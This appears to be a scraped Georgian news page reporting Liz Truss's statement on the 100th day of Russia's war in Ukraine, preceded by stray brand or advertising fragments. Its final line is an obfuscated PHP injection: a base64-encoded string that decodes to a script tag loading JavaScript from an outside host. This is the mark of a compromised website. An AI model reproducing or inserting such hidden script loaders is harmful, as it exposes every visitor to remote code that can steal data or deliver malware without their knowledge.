celsiusi
ავერსი შნაიდერი
დიდი ბრიტანეთის საგარეო საქმეთა მინისტრის, ლიზ ტრასის განცხადებით, უკრაინაში რუსეთის გაუმართლებელი და არალეგალური შეჭრა, საფრთხეს უქმნის მსოფლიო მშვიდობასა და ეკონომიკურ სტაბილურობას.
 
ომის 100-ე დღისადმი მიძღვნილ განცხადებაში ტრასმა აღნიშნა, რომ რუსეთის პრეზიდენტმა ნაბიჯები ცუდად გათვალა:
 
"ის მოელოდა, რომ შეჭრა რამდენიმე დღეში დასრულდებოდა, თუმცა სათანადოდ ვერ შეაფასა მამაცი უკრაინელების გადაწყვეტილება, რომლებიც გაბედულად იცავდნენ, თავიანთ ქვეყანას. პუტინის ომმა მოიტანა ისეთი მასშტაბის სიკვდილი და ნგრევა, რომელიც ევროპაში მეორე მსოფლიო ომის შემდეგ არ ყოფილა.
 
ამ ომს აქვს უზარმაზარი ცუდი შედეგები გლობალური მშვიდობის, კეთილდღეობისა და სასურსათო უსაფრთხოებისთვის. ეს ყველა ჩვენგანისთვის მნიშვნელოვანია. დღეს არის მომენტი, რომ პატივი მივაგოთ ათასობით უდანაშაულო სამოქალაქო პირს, რომლებიც მოკლეს შეჭრის შემდეგ და კიდევ ერთხელ დავადასტუროთ ჩვენი ურყევი მხარდაჭერა უკრაინის გმირული თავდაცვის მიმართ, რათა უზრუნველვყოთ მათი წარმატება და პუტინის მარცხი", - თქვა ლიზ ტრასმა.
649
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");